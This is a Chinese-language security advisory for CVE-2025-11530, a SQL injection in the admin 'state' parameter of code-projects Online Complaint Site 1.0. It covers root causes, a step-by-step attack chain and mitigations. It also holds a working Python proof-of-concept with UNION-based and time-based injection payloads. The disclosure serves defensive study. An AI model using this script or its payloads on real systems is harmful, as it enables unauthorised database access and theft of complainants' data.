CVE-2025-11530：code-projects在线投诉系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11530

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Complaint Site

漏洞概述

CVE-2025-11530是code-projects公司开发的Online Complaint Site（在线投诉管理系统）1.0版本中存在的一个SQL注入安全漏洞。该漏洞于2025年10月9日被公开披露，CVSS 3.1评分为6.3分，属于中危级别漏洞。漏洞位于系统管理后台的/cms/admin/state.php文件中，具体涉及对state参数的处理逻辑存在缺陷，攻击者可以通过构造恶意的SQL语句注入到该参数中，实现对后台数据库的未授权操作。

该漏洞的利用条件相对宽松，攻击者仅需拥有低权限账号（如普通管理员或后台用户）即可通过网络远程发起攻击，无需用户交互配合。由于漏洞利用代码已在GitHub等公开渠道发布，攻击门槛进一步降低，实际威胁程度不容忽视。一旦成功利用，攻击者可读取、修改甚至删除数据库中的敏感数据，包括用户投诉信息、个人隐私数据等，对系统的机密性、完整性和可用性均会造成影响。

code-projects Online Complaint Site是一款用于接收和处理用户投诉的开源Web应用，通常部署在企业或政府机构的内部网络中，用于管理客户反馈。该系统的SQL注入漏洞可能导致大量投诉数据泄露或被篡改，对组织声誉和用户隐私构成严重威胁。建议相关用户尽快关注官方补丁动态，及时采取防护措施。

技术细节

该漏洞属于典型的基于参数的SQL注入（SQLi）类型，根源在于/cms/admin/state.php文件在对state参数进行处理时，未对该参数进行充分的输入验证和过滤，直接将其拼接到后端SQL查询语句中执行。

从技术层面分析，漏洞形成的主要原因包括：1）开发者使用了字符串拼接方式构建SQL查询语句，而非使用参数化查询（Prepared Statements）或预编译语句；2）缺少对用户输入的特殊字符（如单引号'、双引号"、SQL关键字等）的转义或过滤处理；3）未部署Web应用防火墙（WAF）等纵深防御措施。

攻击者可以通过在state参数中注入UNION SELECT等SQL语句片段，实现以下攻击行为：
- 使用UNION操作符联合查询，获取数据库中其他表的数据（如管理员账号、密码哈希等）；
- 使用布尔盲注（Boolean-based Blind SQLi）或时间盲注（Time-based Blind SQLi）逐字节提取敏感信息；
- 使用堆叠查询（Stacked Queries）在某些数据库配置下执行INSERT、UPDATE、DELETE等写操作；
- 利用数据库特性（如MySQL的LOAD_FILE()、INTO OUTFILE等）读取服务器文件或写入Webshell。

由于该漏洞需要低权限认证（PR:L），攻击者首先需要获取一个有效的后台账号（可通过社会工程学、弱口令爆破或购买泄露的凭证等方式获得），然后构造恶意请求即可触发漏洞。

攻击链分析

STEP 1

1. 信息收集

攻击者通过搜索引擎、Shodan等工具识别暴露在公网的Online Complaint Site 1.0实例，并确认目标系统使用存在漏洞的版本。

STEP 2

2. 获取低权限凭证

攻击者通过弱口令爆破、社会工程学、暗网购买泄露凭证或利用其他漏洞获取一个有效的后台低权限账号。

STEP 3

3. 登录后台系统

使用获取的凭证登录/cms/admin/管理后台，建立有效的认证会话（Session）。

STEP 4

4. 构造恶意请求

针对/cms/admin/state.php文件的state参数，构造包含UNION SELECT、布尔条件或时间延迟函数的SQL注入Payload。

STEP 5

5. 发送注入请求

通过认证会话向漏洞端点发送包含恶意Payload的HTTP请求，触发后端数据库执行非预期的SQL语句。

STEP 6

6. 数据提取与利用

从响应内容中提取数据库敏感信息（如管理员密码哈希、用户隐私数据），或利用数据库写权限植入Webshell实现更深层次的入侵。

STEP 7

7. 持久化与横向移动

利用获取的数据库权限创建后门账号、修改系统配置，或通过数据库提权进一步渗透到服务器操作系统层面。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11530 PoC - SQL Injection in Online Complaint Site 1.0
# Vulnerable file: /cms/admin/state.php
# Vulnerable parameter: state

import requests

# Target configuration
TARGET_URL = "http://target.com"
LOGIN_URL = f"{TARGET_URL}/cms/admin/"
VULN_URL = f"{TARGET_URL}/cms/admin/state.php"

# Attacker credentials (low-privilege admin account required)
USERNAME = "admin"
PASSWORD = "password123"

def exploit_sqli():
    """Exploit SQL injection via 'state' parameter using UNION-based technique"""

    # Create a session to maintain cookies
    session = requests.Session()

    # Step 1: Login to obtain authenticated session
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
        "submit": "Login"
    }
    session.post(LOGIN_URL, data=login_data)

    # Step 2: Inject malicious SQL payload into 'state' parameter
    # Payload aims to extract database version and current user
    sql_payload = "1' UNION SELECT 1,user(),database(),version(),5,6,7-- -"

    # Step 3: Send the crafted request to the vulnerable endpoint
    params = {"state": sql_payload}
    response = session.get(VULN_URL, params=params)

    # Step 4: Parse and display extracted information
    if response.status_code == 200:
        print(f"[+] Exploit successful!")
        print(f"[+] Response length: {len(response.text)}")
        # Extract sensitive data from response (customize parsing as needed)
        if "root@localhost" in response.text or "admin" in response.text:
            print(f"[+] Database information leaked in response")
        return response.text
    else:
        print(f"[-] Exploit failed, status code: {response.status_code}")
        return None

def time_based_blind_sqli():
    """Alternative: Time-based blind SQL injection for data exfiltration"""
    session = requests.Session()
    login_data = {"username": USERNAME, "password": PASSWORD, "submit": "Login"}
    session.post(LOGIN_URL, data=login_data)

    # Time-based payload using SLEEP to confirm injection
    payload = "1' AND SLEEP(5)-- -"
    params = {"state": payload}

    response = session.get(VULN_URL, params=params, timeout=10)
    elapsed = response.elapsed.total_seconds()

    if elapsed >= 5:
        print(f"[+] Time-based SQLi confirmed (response delayed {elapsed}s)")
    else:
        print(f"[-] No injection detected")

if __name__ == "__main__":
    print("[*] CVE-2025-11530 Exploit - SQL Injection in state.php")
    print("[*] Running UNION-based exploit...")
    exploit_sqli()
    print("\n[*] Running time-based blind SQLi test...")
    time_based_blind_sqli()

影响范围

code-projects Online Complaint Site 1.0

防御指南

临时缓解措施

在官方补丁发布前的临时缓解措施包括：1）通过WAF或反向代理配置规则，拦截包含SQL关键字（如UNION、SELECT、SLEEP、BENCHMARK等）的state参数请求；2）在Web服务器层面限制/cms/admin/state.php文件的访问，仅允许可信IP地址访问；3）暂时禁用state参数相关功能或注释掉对应的业务逻辑代码；4）加强数据库账号权限控制，确保Web应用使用的数据库账号仅拥有最小必要权限；5）监控数据库日志，对异常的慢查询或大批量数据查询行为设置告警；6）定期轮换后台管理员密码，避免使用弱口令。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11530
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11530
3 Details https://www.cvedetails.com/cve/CVE-2025-11530/
4 VulDB https://vuldb.com/cve/CVE-2025-11530
5 Link https://code-projects.org/
6 Link https://github.com/xmqaq/cve/issues/1
7 Link https://vuldb.com/?ctiid.327668
8 Link https://vuldb.com/?id.327668
9 Link https://vuldb.com/?submit.670208
10 Link https://github.com/xmqaq/cve/issues/1